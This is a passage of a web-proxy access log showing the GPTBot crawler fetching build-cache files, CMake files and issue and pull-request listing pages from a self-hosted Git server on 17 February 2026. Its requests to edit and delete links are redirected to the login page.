9986] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" +[17/Feb/2026:18:36:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json?display=rendered" [Client 74.7.227.38] [Length 11141] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json" +[17/Feb/2026:18:36:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json" [Client 74.7.227.38] [Length 12975] [Gzip 7.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json" +[17/Feb/2026:18:36:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json" [Client 74.7.227.38] [Length 12998] [Gzip 7.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json" +[17/Feb/2026:18:36:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json" [Client 74.7.227.38] [Length 9996] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json" +[17/Feb/2026:18:37:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json" [Client 74.7.227.38] [Length 9973] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json" +[17/Feb/2026:18:37:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 22369] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" +[17/Feb/2026:18:37:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 22369] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" +[17/Feb/2026:18:37:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json" [Client 74.7.227.38] [Length 1254] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json" +[17/Feb/2026:18:37:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json" [Client 74.7.227.38] [Length 1254] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json" +[17/Feb/2026:18:37:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 22369] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" +[17/Feb/2026:18:37:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 35736] [Gzip 10.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:18:37:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10256] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:18:37:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10254] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" +[17/Feb/2026:18:37:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcUaMinimal%2fTestService%2fTestService.csproj" [Client 74.7.227.38] [Length 21834] [Gzip 3.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/TestService.csproj" +[17/Feb/2026:18:37:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?milestone=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10019] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?milestone=-1&sort=latest&state=all&type=all" +[17/Feb/2026:18:37:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-2_error.log?display=rendered" [Client 74.7.227.38] [Length 11169] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-2_error.log" +[17/Feb/2026:18:37:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=source" [Client 74.7.227.38] [Length 11612] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:18:37:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=source" [Client 74.7.227.38] [Length 11618] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:18:37:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=rendered" [Client 74.7.227.38] [Length 11091] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:18:37:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10015] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=leastcomment&state=closed&type=all" +[17/Feb/2026:18:37:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10204] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=mostcomment&state=closed&type=all" +[17/Feb/2026:18:37:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 46760] [Gzip 22.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" +[17/Feb/2026:18:37:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 9987] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" +[17/Feb/2026:18:37:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 22369] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" +[17/Feb/2026:18:37:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10012] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=recentupdate&state=closed&type=all" +[17/Feb/2026:18:37:11 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" +[17/Feb/2026:18:37:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" +[17/Feb/2026:18:37:12 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" +[17/Feb/2026:18:37:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" +[17/Feb/2026:18:37:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&milestone=-1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10008] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:18:37:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 9997] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=nearduedate&state=closed&type=all" +[17/Feb/2026:18:37:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?milestone=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 9996] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=mostcomment&state=open&type=all" +[17/Feb/2026:18:37:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10165] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=recentupdate&state=open&type=all" +[17/Feb/2026:18:37:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10173] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=leastcomment&state=open&type=all" +[17/Feb/2026:18:37:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 9992] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=farduedate&state=open&type=all" +[17/Feb/2026:18:37:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10216] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=farduedate&state=closed&type=all" +[17/Feb/2026:18:37:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?milestone=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10172] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=farduedate&state=open&type=all" +[17/Feb/2026:18:37:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?milestone=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10168] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=farduedate&state=open&type=all" +[17/Feb/2026:18:37:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10190] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=farduedate&state=open&type=all" +[17/Feb/2026:18:37:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/CMakeLists.txt?display=rendered" [Client 74.7.227.38] [Length 11013] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/CMakeLists.txt" +[17/Feb/2026:18:37:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/CMakeLists.txt?display=source" [Client 74.7.227.38] [Length 11635] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/CMakeLists.txt" +[17/Feb/2026:18:37:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeCache.txt?display=source" [Client 74.7.227.38] [Length 18935] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeCache.txt" +[17/Feb/2026:18:37:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/CMakeLists.txt?display=rendered" [Client 74.7.227.38] [Length 11014] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/CMakeLists.txt" +[17/Feb/2026:18:37:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeCache.txt?display=source" [Client 74.7.227.38] [Length 18937] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeCache.txt" +[17/Feb/2026:18:37:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 9971] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&sort=latest&state=all&type=all" +[17/Feb/2026:18:37:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 9974] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&sort=latest&state=all&type=all" +[17/Feb/2026:18:37:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/CMakeLists.txt?display=rendered" [Client 74.7.227.38] [Length 11224] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/CMakeLists.txt" +[17/Feb/2026:18:37:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cmake_install.cmake?display=source" [Client 74.7.227.38] [Length 13787] [Gzip 4.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cmake_install.cmake" +[17/Feb/2026:18:37:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/tempCodeRunnerFile.py?display=source" [Client 74.7.227.38] [Length 13914] [Gzip 3.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/tempCodeRunnerFile.py" +[17/Feb/2026:18:37:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?milestone=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10025] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?milestone=-1&sort=oldest&state=all&type=all" +[17/Feb/2026:18:37:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10018] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&state=all&type=all" +[17/Feb/2026:18:37:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr 